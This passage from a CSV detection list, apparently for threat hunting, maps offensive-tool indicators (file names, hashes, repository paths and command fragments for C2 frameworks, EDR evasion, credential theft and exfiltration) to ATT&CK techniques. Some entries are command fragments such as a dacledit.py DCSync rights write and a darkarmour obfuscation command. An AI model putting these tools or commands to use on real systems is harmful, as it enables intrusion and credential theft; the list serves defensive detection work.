tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*d091e408c0c5068b86bb69d17e91c5a7d6da46c0bd4101aa14f136246aed7f51*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*d09ccee4-pass-word-0000-98677e2356fd*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*d0ebb728926cce530040e046a8ea2f47e01158581cb0b5cccddc91007b421f6c*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*D1rkInject.cpp*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*D1rkInject.exe*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*D1rkInject.iobj*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*D1rkInject.log*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*D1rkInject.sln*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*D1rkInject.vcxproj*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*D1rkInject-main*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*D210570B-F1A0-4B66-9301-F7A54978C178*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" +"*d2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*d2hvYW1p*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" +"*d38210acb6d0568559041036abd033953c4080170e1ea9cf5d4d8499b54141b7*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*d3ckx1/Crack-allDBs*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" +"*d494a4bc-3867-436a-93ef-737f9e0522eb*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*d4acf557a541579d5a8992b9514169fc05c40f26144ad8a560d8ef8d0a3cce0e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*D4Vinci*","offensive_tool_keyword","Github Username","Github user: A hacker. high&low-level coder and a lot of things between. An extremely curious creature loves to learn. Break things or make things that break things.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/D4Vinci/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*d7fbfd69df3840022dab1f8f2d529ce04abac8cee0234448bfd0a67feb6aea22*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*DA230B64-14EA-4D49-96E1-FA5EFED9010B*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*da26a5e6b6a29023ee4ab6b54fd24ab13bebed4bcaaac910379119463bba62fa*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*da50f691771c3694ae8821095113a29cf3333e728a31a56f25d08c1a43c9e173*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*dacledit.py -action write -rights DCSync -principal * -target-dn *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*daem0nc0re/PrivFu*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*dafthack/HostRecon*","offensive_tool_keyword","HostRecon","Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.","T1082 - T1087 - T1033","TA0001 - TA0007 - ","N/A","N/A","Information Gathering","https://github.com/dafthack/HostRecon","1","1","N/A","N/A","5","401","114","2017-10-03T13:25:06Z","2017-03-28T14:53:21Z" +"*dafthack/MailSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*dafthack/MFASweep*","offensive_tool_keyword","FMFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1033","152","2023-07-25T05:10:55Z","2020-09-22T16:25:03Z" +"*DallasFR/Cobalt-Clip*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10",,"N/A",,, +"*DallasFR/WinShellcode*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*DAMP-master.zip","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" +"*DancingRightToLeft.py*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*danielbohannon*","offensive_tool_keyword","Github Username","Github user author of powershell obfuscation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/danielbohannon","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*danielmiessler/SecLists*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*danielmiessler/SecLists.git*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*DanMcInerney/Empire*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*DanMcInerney/icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*DanMcInerney/net-creds*","offensive_tool_keyword","net-creds","Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.","T1040 - T1039 - T1036 - T1003","TA0006 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/net-creds","1","1","N/A","N/A","10","1562","443","2022-03-23T10:40:42Z","2015-01-07T18:47:46Z" +"*DanMcInerney/theHarvester*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*daphne-main.zip*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" +"*daphne-x64 * pid=*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","0","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" +"*darkarmour -f *.exe --encrypt xor --jmp --loop 7 -o *.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*darkarmour.py*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" +"*darkarmour-master*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" +"*DarkCoderSc/SharpShellPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*darkhotel backdoor*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*DarkHotel C2*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*darkhotel data exfil server*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*darkhotel_headers*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*DarkLoadLibrary-maser*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","875","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" +"*darkr4y/geacon*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*DarkRCovery.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*DarkWidow-main*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" +"*das add -db dbname masscan *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*das add -db dbname rustscan *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*das report -hosts 192.168.1.0/24 -oA report2*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*das scan -db dbname -hosts all -oA report1 -nmap '-Pn -sVC -O' -parallel*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*das scan -db dbname -ports 22*80*443*445 -show*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dashlane2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*data/ipwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*data/payloads/stager.ps1*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*data/shell/backdoors*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*data/shell/stagers*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*data/wordlist_256.txt*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*data/wordlists*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Data\VulnerableCOM.csv*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*DataSploit*","offensive_tool_keyword","datasploit","Performs OSINT on a domain / email / username / phone and find out information from different sources","T1247 - T1593 - T1271 - T1110 - T1122 - T1123","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/dvopsway/datasploit","1","1","N/A","N/A","3","227","669","2022-12-04T16:02:57Z","2016-05-26T03:34:43Z" +"*datr=80ZzUfKqDOjwL8pauwqMjHTa*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*DavidXanatos/DiskCryptor*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*DavRelayUp.csproj*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows 